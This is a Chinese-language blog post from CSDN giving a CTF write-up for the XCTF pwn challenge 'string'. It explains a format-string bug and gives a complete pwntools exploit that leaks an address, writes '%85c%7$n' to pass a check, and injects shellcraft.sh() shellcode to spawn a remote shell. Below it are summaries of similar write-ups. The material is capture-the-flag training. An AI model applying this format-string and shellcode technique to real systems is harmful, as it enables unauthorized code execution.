攻防世界 pwn string

最新推荐文章于 2024-07-16 02:03:11 发布
最新推荐文章于 2024-07-16 02:03:11 发布
阅读量221 收藏
点赞数
分类专栏: ctf 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YANG12345_6/article/details/120946254
版权
该博客详细描述了一个利用存在格式化字符串漏洞的程序,通过精心构造的输入触发漏洞,将输入转换为函数指针并执行shellcode来获取系统的shell。过程中涉及到地址泄露、shellcode生成以及交互式shell的建立。
摘要由CSDN通过智能技术生成

存在格式化字符串漏洞
漏洞点:
在这里插入图片描述
写入shellcode的点 :
在这里插入图片描述
判断*a1是否等于a1[1],*a1 = 68,a1[1] = 85。下面有一个read函数,将输入存放在v1,再下面有一个通过函数指针进行强制类型转换,将刚才的输入转换成一个函数,最后执行。

exp:

from pwn  import *

#p = process("./string")
p = remote("111.200.241.244",'52204')

p.recvuntil("secret[0] is ")
addr = int(p.recvuntil("\n")[:-1],16)  # 获取地址,并用16进制保存起来
print(addr)

p.recvuntil("character's name be:\n")
p.sendline("aaaa")
p.recvuntil(" will go?east or up?:\n")
p.sendline("east")
p.recvuntil("there(1), or leave(0)?:\n")
p.sendline("1")
p.recvuntil("me an address'\n")
p.sendline(str(addr))
p.recvuntil("you wish is:\n")
p.sendline("%85c%7$n")

# sub_400CA6():v1会被强制转成函数指针并且得到执行,所以传入一个system()函数去getshell
# shellcraft 是一个帮忙生成shellcode的类. shellcraft.sh():获得执行system(“/bin/sh”)汇编代码所对应的机器码
# 在shellcraft前要写context
context(os = 'linux',arch = 'amd64')
shellcode = asm(shellcraft.sh())

p.recvuntil("SPELL\n")
p.sendline(shellcode)
p.interactive()
Y0ng.
关注
专栏目录
攻防世界pwn-string
a_silly_coder的博客
05-18 339
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1428
学习pwn开始,慢慢来不要急
[PWN](攻防世界)string
ljh15937的博客
09-21 1213
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
攻防世界PWN [GFSJ0469] string (不太正经的wp)
最新发布
qq_52161487的博客
07-16 966
拐角的光线很暗,暗得我看不清她的脸和表情,还有烦人的蚊子一直叮我的腿,但从来没有任何一个夏天的感觉能够如此真实。为了回家,勉为其难地,我答应了她。那个她曾和我说过,你们这些人整天对着电脑看书,一个劲儿地用一个女生头像的软件,这一横条一横条的是什么东西,一会goto一会mov的,就像是在走迷宫。前两天在我MP3上听的那首周董的歌你还记得嘛,远方传来风笛,我只在意有你的消息......”好吧,都已经走到现在了,回去未免沦为笑柄,也辜负了巫师小姐姐对我们的期望,我们要做的只能是硬着头皮走下去,来吧,
攻防世界pwn——string
qq_62076255的博客
11-05 710
攻防世界pwn——string
攻防世界 Pwn string
MrTreebook的博客
11-22 162
攻防世界pwn string1.checksec看一下保护2.IDA分析一下源码 1.checksec看一下保护 除了PIE其他保护都开了 2.IDA分析一下源码 v3申请了8大小的内存空间,然后在前4个空间中存放了数字68,在后四个空间中存放了数字85。而v4中存放的是v3的内容,并不是68和85两个数字,而是存放了两个数字的内存空间地址。 ...
攻防世界pwn新手区整理
Lenard404的博客
08-19 3200
小白尝试做pwn题QAQ get shell 惯例: IDA查看main函数: 显然直接连接就可以得到权限。 nc ls cat 一条龙服务: 菜鸟教程的Linux命令大全 hello pwn 惯例: IDA查看main: 查看if语句后的函数: 目的明确:进入if语句。 计算60106C和601068的偏移为4,read可以读入0x10,直接输入条件即可。 exp: from pwn import* r = remote('111.200.241.244',64067) payload = '
pwn攻防世界 pwn新手区wp
woodwhale的博客
08-10 7289
pwn攻防世界 pwn新手区wp 前言 这几天恶补pwn的各种知识点,然后看了看攻防世界pwn新手区没有堆题(堆才刚刚开始看),所以就花了一晚上的时间把新手区的10题给写完了。 1、get_shell 送分题,连接上去就是/bin/sh 不过不知道为啥我的nc连接不上。。。 还是用pwntool的remote连接的 from pwn import * io = remote("111.200.241.244", 64209) io.interactive() 2、hello pwn 可以看
攻防世界 pwn练习区解法 write up
qq_46441427的博客
02-16 860
checksec stack: canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数 NX 数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行 PIE 程序装在随机的地址 ASLR 即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址 ...
pwn string
weixin_45677731的博客
03-13 622
题目来源:攻防世界 拿到题目后checksec 可以看到是64位的,拖到ida里看一下 有个v3=malloc(8ull) 这个函数查了一会儿,分配内存的,最后的结果就是v3前面放了68,后面放了85 点进sub_400d72这个函数看一下 可以看到这里有三个主要的函数,我们逐个分析 第一个 ...
攻防世界STRing
WangLal的博客
07-06 333
攻防世界PWN String的WP 基本的三步checksec,file,执行文件 这是一个64位文件,只有pIE没开。 由string这个题目猜测可能会是字符串漏洞 将下载好的附件扔进IDA里查看,点击main函数 main函数中找不到,那就在其他函数看一下。 点击 sub_400D72 要进入if条件中,输入的s的长度需小于12位 在sub_400BB9函数中看到了 printf前几句中存在%s与%ld,可以操作. 继续看下一个函数 (a1+4是指a1加4个字节,也就是一个整数类型所以这个就是a
攻防世界-pwn-String
weixin_44558065的博客
10-19 357
本人为萌新,以下只是个人看法。
攻防世界string
qq_25044201的博客
12-30 183
这道题是我在新手区见到的最难的一道题,涉及了格式化字符串,shellcode注入,最难的还是这个过程。繁杂,琐屑。 这句是最关键的,创建个内存然后作为指针函数。这里注入shellcode就可以。但是有个前提a[0]=a[1]我们要通过格式化字符串修改a[0]=85使得a[0]=a[1] ...
攻防世界 string
BengDouLove的博客
03-22 1195
这回终于做上了一道像一个小系统一样的题,有很多输入输出,程序逻辑也复杂了一点,比赛中我看都是这样的题,一直以来遇到这样的题都是不知所措,从这一道开始练手把 这是一个文字版RPG game… 一开始看main函数看不出来什么,注意到输出了secret 输出secret之后进入另一个函数,将v4的值传了进去 然后让输入名字,这里好像没有溢出,名字长度小于12 输入名字之后进入三个函数的第一个,开始...
[攻防世界]string
逆向萌新的博客
06-20 199
[攻防世界]string详解
攻防世界PWN-string
Deeeelete的博客
11-15 692
题目:string 进PE或者checksec 64位程序 堆栈不可执行以及栈保护 运行一遍好像是一个文字游戏 剧情游戏?分析一波主要任务分支: 情况1:开始游戏,啥也不输入,60秒之后程序自动关闭 情况2:开始游戏,输入名称,名称超过了12个字符,直接出局 情况3:开始游戏,输入小于12个字符的名称,进入剧情问我走east还是up,如果选择up程序会一直死循环 情况4:开始游戏,输入小于12个字符的名称,进入剧情走east,然后问我选择1还是0,选择0,原地暴毙 情况5:开始游
攻防世界pwn类题中string
05-11
攻防世界Pwn类题目中,`string`通常是指一个用于存储字符串的字符数组或指针,是一个C语言中常见的数据类型。在Pwn类题目中,`string`往往是一个非常重要的数据结构,因为大多数漏洞都与字符串的处理有关。例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值